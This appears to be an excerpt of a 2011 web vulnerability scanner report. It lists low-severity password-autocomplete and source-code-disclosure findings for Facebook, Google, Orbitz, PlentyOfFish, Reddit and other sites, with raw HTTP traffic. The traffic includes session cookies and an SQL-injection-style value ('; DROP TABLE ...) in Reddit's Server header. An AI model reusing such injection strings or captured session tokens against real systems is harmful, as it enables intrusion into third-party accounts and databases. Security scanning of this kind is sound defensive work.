Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/r.php?possible_fb_user=1&app_id=0&is_enabled=1&next&locale=en_US

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

GET /r.php?possible_fb_user=1&app_id=0&is_enabled=1&next&locale=en_US HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

13.130. http://www.facebook.com/terms.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /terms.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

13.131. https://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

13.132. https://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

13.133. https://www.facebook.com/2008/fbml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/2008/fbml

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.134. https://www.facebook.com/login.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

13.135. https://www.google.com/accounts/Login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/Login

Issue detail

The page contains a form with the following action URL:

https://www.google.com/accounts/ServiceLoginAuth

The form contains the following password field with autocomplete enabled:

Passwd

Request

Response

13.136. http://www.hotelclub.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.hotelclub.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.hotelclub.com/membercheckref.asp

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.hotelclub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 228103
Content-Type: text/html; Charset=windows-1252
Expires: Tue, 01 Feb 2011 15:57:52 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Date: Wed, 02 Feb 2011 15:57:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E0; path=/
Set-Cookie: ltvisit=%7B668F2047%2D797A%2D453F%2DAADB%2D68FEEAF42C18%7D; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACTBCTST=JDLDPPJDKIGOMNJCOGBEAPHD; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273a45525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 228103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div id="MemberLoginTemplate" class="logout_padding">
<form method="post" name="frmLogin" onSubmit="return CheckVal(this)" action="https://www.hotelclub.com/membercheckref.asp"><img height="47" width="280" alt="" src="siteengine/htc/img/dreamclub-trans-EN.png">
...[SNIP]...
</label><input id="password" name="password" type="password" class="forminput" value=""><div class="clear">
...[SNIP]...

13.137. https://www.orbitz.com/Secure/SignIn previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/SignIn

Issue detail

The page contains a form with the following action URL:

https://www.orbitz.com/Secure/ValidateLogin?z=5604&r=e

The form contains the following password field with autocomplete enabled:

password

Request

Response

13.138. https://www.orbitz.com/account/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/account/login

Issue detail

The page contains a form with the following action URL:

https://www.orbitz.com/account/login

The form contains the following password field with autocomplete enabled:

models['loginPasswordInput'].password

Request

Response

13.139. https://www.orbitz.com/account/registration previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/account/registration

Issue detail

The page contains a form with the following action URL:

https://www.orbitz.com/account/registration

The form contains the following password fields with autocomplete enabled:

models[registration].passwordComposite.password
models[registration].passwordComposite.passwordConfirmation

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A7D6B6C6B73BC640D7493A94555D7334; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:30:35 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:16:28 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure
Content-Length: 23404

...[SNIP]...
</div>

<form action="https://www.orbitz.com/account/registration" method="post" >

<input type="hidden" name="execution" value="e1s1" />
...[SNIP]...
</span>
        <input type="password" name="models[registration].passwordComposite.password" value="" />
            </label>
...[SNIP]...
</span>
        <input type="password" name="models[registration].passwordComposite.passwordConfirmation" value="" />
            </label>
...[SNIP]...

13.140. https://www.orbitz.com/trips/writeReview previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/trips/writeReview

Issue detail

The page contains a form with the following action URL:

https://www.orbitz.com/trips/writeReview

The form contains the following password field with autocomplete enabled:

models['loginPasswordInput'].password

Request

Response

13.141. http://www.plentyoffish.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.plentyoffish.com/inbox.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

13.142. http://www.plentyoffish.com/inbox.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/inbox.aspx

Issue detail

The page contains a form with the following action URL:

http://www.plentyoffish.com/inbox.aspx?Guid=&SID=#in

The form contains the following password field with autocomplete enabled:

password

Request

Response

13.143. http://www.plentyoffish.com/meetme.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/meetme.aspx

Issue detail

The page contains a form with the following action URL:

http://www.plentyoffish.com/?SID=enhftrh2rwh40ylxbcdqkhlw

The form contains the following password field with autocomplete enabled:

password

Request

Response

13.144. http://www.plentyoffish.com/needs_test.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/needs_test.aspx

Issue detail

The page contains a form with the following action URL:

http://www.plentyoffish.com/?SID=enhftrh2rwh40ylxbcdqkhlw

The form contains the following password field with autocomplete enabled:

password

Request

Response

13.145. http://www.plentyoffish.com/poftest.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/poftest.aspx

Issue detail

The page contains a form with the following action URL:

http://www.plentyoffish.com/?SID=enhftrh2rwh40ylxbcdqkhlw

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:29:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9979

<html><head><title>100% Free Personality Relationship Chemistry Test</title>

<META name="description" content="A Free Personality test that measures relationship compatibility for singles.">
...[SNIP]...
<td>

   <form action="?SID=enhftrh2rwh40ylxbcdqkhlw" method="post" name="frmLogin" >

        <table cellspacing="0" cellpadding="0" bgcolor="#CDE3EE" style="border: 1px solid #9BACB4;" align="center">
...[SNIP]...
<td align="center"><input type="password" name="password" size="8" style="width:75px"></td>
...[SNIP]...

13.146. http://www.plentyoffish.com/poftest.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/poftest.aspx

Issue detail

The page contains a form with the following action URL:

http://www.plentyoffish.com/?SID=owu154wxdpyyj353a5vg5avm

The form contains the following password field with autocomplete enabled:

password

Request

GET /poftest.aspx HTTP/1.1
Host: www.plentyoffish.com
Proxy-Connection: keep-alive
Referer: http://www.plentyoffish.com/register.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ft=Monday, January 31, 2011 5:25:37 PM; my_ipcountry=1; __utmz=9489908.1296527588.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; ASP.NET_SessionId=owu154wxdpyyj353a5vg5avm; __utmx=9489908.00012890560422417014:1:0-1-1-0; __utmxx=9489908.00012890560422417014:4130340:2592000; screen=1024; __utma=9489908.1831818404.1296523584.1296527588.1296915500.3; __utmc=9489908; __utmb=9489908.6.10.1296915500

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 05 Feb 2011 14:19:56 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 9977

<html><head><title>100% Free Personality Relationship Chemistry Test</title>

<META name="description" content="A Free Personality test that measures relationship compatibility for singles.">
...[SNIP]...
<td>

   <form action="?SID=owu154wxdpyyj353a5vg5avm" method="post" name="frmLogin" >

        <table cellspacing="0" cellpadding="0" bgcolor="#CDE3EE" style="border: 1px solid #9BACB4;" align="center">
...[SNIP]...
<td align="center"><input type="password" name="password" size="8" style="width:75px"></td>
...[SNIP]...

13.147. http://www.plentyoffish.com/seriousintro.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/seriousintro.aspx

Issue detail

The page contains a form with the following action URL:

http://www.plentyoffish.com/?SID=enhftrh2rwh40ylxbcdqkhlw

The form contains the following password field with autocomplete enabled:

password

Request

Response

13.148. http://www.ratedesi.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ratedesi.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.ratedesi.com/login.php

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ratedesi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.149. http://www.ratedesi.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ratedesi.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.ratedesi.com/signup.php

The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ratedesi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 06:48:24 GMT
Server: Apache/2.2.16 (EL)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=odm00hplmonq2l4mff2kcmq426; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta property="fb:admins" content="406321" />
<meta property="fb:page_id" content="3797
...[SNIP]...
<hr>
<FORM method="post" action="http://www.ratedesi.com/signup.php">
<div class="element">
...[SNIP]...
<span><INPUT type="password" name="PW1" class="text"></span>
...[SNIP]...
<span><INPUT type="password" name="PW2" maxlength="16" class="text"></span>
...[SNIP]...

13.150. http://www.ratestogo.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ratestogo.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.ratestogo.com/Membership/MemberCheck.asp

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.ratestogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.151. http://www.reddit.com/domain/static.2mdn.net/new/x22 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.reddit.com
Path:	/domain/static.2mdn.net/new/x22

Issue detail

The page contains a form with the following action URL:

http://www.reddit.com/domain/static.2mdn.net/post/reg

The form contains the following password fields with autocomplete enabled:

passwd
passwd2

Request

GET /domain/static.2mdn.net/new/x22 HTTP/1.1
Host: www.reddit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: '; DROP TABLE servertypes; --
Date: Wed, 02 Feb 2011 19:30:39 GMT
Content-Length: 27361
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" ><head><titl
...[SNIP]...
</p><form id="login_reg" method="post" action="http://www.reddit.com/domain/static.2mdn.net/post/reg" onsubmit="return post_user(this, 'register');" target="_top"><input type="hidden" name="reason" value="" />
...[SNIP]...
</label><input id="passwd_reg" name="passwd" type="password" maxlength="20"/><span class="error BAD_PASSWORD field-passwd" style="display:none">
...[SNIP]...
</label><input name="passwd2" id="passwd2_reg" type="password" maxlength="20" /><span class="error BAD_PASSWORD_MATCH field-passwd2" style="display:none">
...[SNIP]...

13.152. http://www.reddit.com/domain/static.2mdn.net/new/x22 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.reddit.com
Path:	/domain/static.2mdn.net/new/x22

Issue detail

The page contains a form with the following action URL:

http://www.reddit.com/domain/static.2mdn.net/post/login

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /domain/static.2mdn.net/new/x22 HTTP/1.1
Host: www.reddit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.153. http://www.reddit.com/domain/static.2mdn.net/x22 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.reddit.com
Path:	/domain/static.2mdn.net/x22

Issue detail

The page contains a form with the following action URL:

http://www.reddit.com/domain/static.2mdn.net/post/reg

The form contains the following password fields with autocomplete enabled:

passwd
passwd2

Request

GET /domain/static.2mdn.net/x22 HTTP/1.1
Host: www.reddit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: '; DROP TABLE servertypes; --
Date: Wed, 02 Feb 2011 19:30:39 GMT
Content-Length: 27361
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" ><head><titl
...[SNIP]...
</p><form id="login_reg" method="post" action="http://www.reddit.com/domain/static.2mdn.net/post/reg" onsubmit="return post_user(this, 'register');" target="_top"><input type="hidden" name="reason" value="" />
...[SNIP]...
</label><input id="passwd_reg" name="passwd" type="password" maxlength="20"/><span class="error BAD_PASSWORD field-passwd" style="display:none">
...[SNIP]...
</label><input name="passwd2" id="passwd2_reg" type="password" maxlength="20" /><span class="error BAD_PASSWORD_MATCH field-passwd2" style="display:none">
...[SNIP]...

13.154. http://www.reddit.com/domain/static.2mdn.net/x22 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.reddit.com
Path:	/domain/static.2mdn.net/x22

Issue detail

The page contains a form with the following action URL:

http://www.reddit.com/domain/static.2mdn.net/post/login

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /domain/static.2mdn.net/x22 HTTP/1.1
Host: www.reddit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.155. http://www.shape.com/workouts/articles/blood_sugar.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/blood_sugar.html

Issue detail

The page contains a form with the following action URL:

http://www.shape.com/kickapps/public/ajax-login

The form contains the following password field with autocomplete enabled:

password

Request

GET /workouts/articles/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.156. http://www.shape.com/workouts/articles/workout_schedule.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/workout_schedule.html

Issue detail

The page contains a form with the following action URL:

http://www.shape.com/kickapps/public/ajax-login

The form contains the following password field with autocomplete enabled:

password

Request

GET /workouts/articles/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.157. http://www.threatexpert.com/signin.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/signin.aspx

Issue detail

The page contains a form with the following action URL:

http://www.threatexpert.com/signin.aspx

The form contains the following password field with autocomplete enabled:

Login1$Password

Request

Response

13.158. http://www.threatexpert.com/signup.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/signup.aspx

Issue detail

The page contains a form with the following action URL:

http://www.threatexpert.com/signup.aspx

The form contains the following password fields with autocomplete enabled:

txtPassword
txtPassword2

Request

Response

13.159. http://www.untraceableemail.net/boobitrap/eCheck.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.untraceableemail.net
Path:	/boobitrap/eCheck.php

Issue detail

The page contains a form with the following action URL:

http://www.untraceableemail.net/boobitrap/validateUser.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /boobitrap/eCheck.php HTTP/1.1
Host: www.untraceableemail.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.160. http://www.worldmastiffforum.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.worldmastiffforum.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.worldmastiffforum.com/register

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.worldmastiffforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14. Source code disclosure previous next
There are 12 instances of this issue:

http://fitbie.msn.com/
https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
https://gc.synxis.com/xbe/scripts/xbe.js
https://login.hitbox.com/images/001982.banner_viralvideo_v1.hbx923x320.jpg
http://meyerweb.com/eric/tools/css/reset/
http://trw.com/00_assets/02_videos/Orb_Loop.flv
http://updates.orbitz.com/pos/ocom/coBrand/msn/orbitzmsn.css
http://www.addthis.com/bookmark.php
http://www.ehow.com/about_us/about_us.aspx
http://www.orbitz.com/shared/js/global.js
http://www.plentyoffish.com/helperb.js

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

14.1. http://fitbie.msn.com/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://fitbie.msn.com
Path:	/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET / HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
Last-Modified: Tue, 01 Feb 2011 12:23:26 +0000
ETag: "1296563006"
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 15:32:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div class="panel-wrap-top clear-block">
<?php// print_r($content);?>
<div class="panel-panel panel-top-left">
...[SNIP]...

14.2. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://fpdownload.macromedia.com
Path:	/get/flashplayer/current/swflash.cab

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /get/flashplayer/current/swflash.cab HTTP/1.1
Host: fpdownload.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 25 Oct 2010 23:47:03 GMT
ETag: "b72012-2a53a6-9bea6bc0"
Accept-Ranges: bytes
Content-Length: 2773926
Content-Type: text/plain
Date: Wed, 02 Feb 2011 19:20:39 GMT
Connection: close

MSCF.....=*.....D............................=*.................W..............;.s .swflash.inf..%+.......U=.. .FP_AX_CAB_INSTALLER.exe...~..@..[...
.`;v."Sp$......g...BN..0.C.8AH+..
0..H.....pv.90.;.
...[SNIP]...
<,..j.i......e.?Y0..N.}/..d..YfdD.Hs...g..l.:...<?.....*az..Bu.)~...U5B...&ZGe..[...q.a.K~....M.....wg......+....]..D.....f....D..r.1L...'..3q.H.NJk.........8.O.0.....b....kz.W_..M.'C>....(.....k.k....).h#.&....<.(.X.oL)..Y..Y........e.L.F.D.UW.(.AQ.u...8LK1It........^P...3l.....e.<g.8A..IZ........-....5t).T...^.|..p..Kn..'.F(.YQ7.T..M....c..@.`!&K.......;Y&.,...u..!1.Ir..8......-.s_....QK%^...'s........\i"..R*..S....e.P.t.}..E.....[}l
P.....}....k@.....$-.RG...a..\t....sKtFW|c]....B.....0Kw..*DR..)s2]6.x.v.J.......+.]q...i...V|...bJ...z._|..U.9.v.#.sM~......kU...BOB
.@..?zu.%K&dhJs(.    .R....._.P._...U..n.8....|.....3........l.7@......,..Qpj..Is..r...Zc.....g.....e..R.w...&..
.X%.A...i|B.....%U\Y...*NgZ........    J7...H$6..*...>d/..._
.......Y....#f.6..S*5LuLZ...=IY.T.I.....].]*..............?....cS.!.....K.....~.... ...'.A..{9^.X.....!.'.5.:.\.APO{....~....,<x..~..r...x.....pL.....R...S..q@*H.N:..{.Q..Us1(.ju..+D.....    &....).....|d..G....zQ.h.]....M..(.....+..z5..^.....".^.'..O.%D.......K....@.f... ].D~........9.jQ.......Q....g_
7.P...JL.F......a...o...i@W03P....)...>lI....'.h.......(z..g31.x    ....=".u.Y..j.n.:m..5,).q6S.xI.>.....q.M|_...<......&..&.E4.......A.c(..........=.+...E.....u...$.Y9...u..K.JW.G.7.{n...pjU...R..>/.....qx.o.*..m_..T....y..:.v.w.:.ws;.;....n.}'...#.....................dw.;o..;f..;d..N...#v..p...Vwl;@;c;r:...l;.:^.l.|:..Hv(w...u2...C....;.;h..;o...\...u...:a.Gj.........0>bg)..J.)>....|......G.q.4..mL...}A......... ].4...jC,....~....^.f...........'...i........x.......).*./pp.K9.;.1^.
..?.xRD.zC)....."    .....b......ZMt-.R%.h...z....xV.!M.Q.8..r..:......+......!.y...7....1i&8...h.."MG]).w....o.4
0t&.....1.._........Is......I._:.....NQLT6l9.(:.3~....^q...M..v.D2......[....V\.R....\T..i..C,..z....uQ.+Z.%V...i.%.<p.If.>..`......Q.......B.....D.. ..T..h.qa..C".i..Q.J8.......g...p...._x.....2\.9?...
.q.zP4...>....X..    ....;+C....!7.dS..9..9..........|.x..IS.:.....IDF..LYV.2I$...)Z...=..H.o)..u......[{.m.n...{~...............    .........()..j..^<....     ..I.N..(....4..!..I.SIv.9^.bF....6q..<.%.]Q..!..{..O..m\b..}.YBJ.h.`..n*.ZA.
.s....$_0U..'.. ..r*..!l.P>.s..LN.X.I
X.....8o...l..,.h",..u.......M.9.J....$pI..16.&.l.*....E...[.........Q..;.L...........]S|2"...!...o.<.....G..=.....E...O..a.$...B;.    c..MI.....$.AfE.w.>.....*.BW....`N......
./N.....9..r".........J....2..X...C.... ....d$...=.Vi...[.V4..q...dQc....T#.2.K.L........1...b.m..w.... ....`....D.Q..fb3&..o..P7..a....1..........V=V..":a... ...H...l......Mxm..r+..........KN.#w.C.]Cu.K.H..m..O..0{..>....>.2P........Tg..y.zS.::.n....D.0.8.;.u...;2.%`......t.._^.........J....R=.........&..>..O..4.............;a....r....Hg9...;Y%y..(.\....Cf..~=C,....=w.x....:..g^.k0.w....r.GivE.._...q.gAFrCU....i.)..\L......e1.......|k...D..z...]'...1\v.Y~...#*..<.q.4..<.}.p".....H.Lc....e...XfknkLgD..G....JPT.]?...."(.....4.\....v.K....)
Q...<i'.`..G.U...U..+!...:.0..KS.;..Y...fv.p\-....)X..G    7:...K.WX...3.
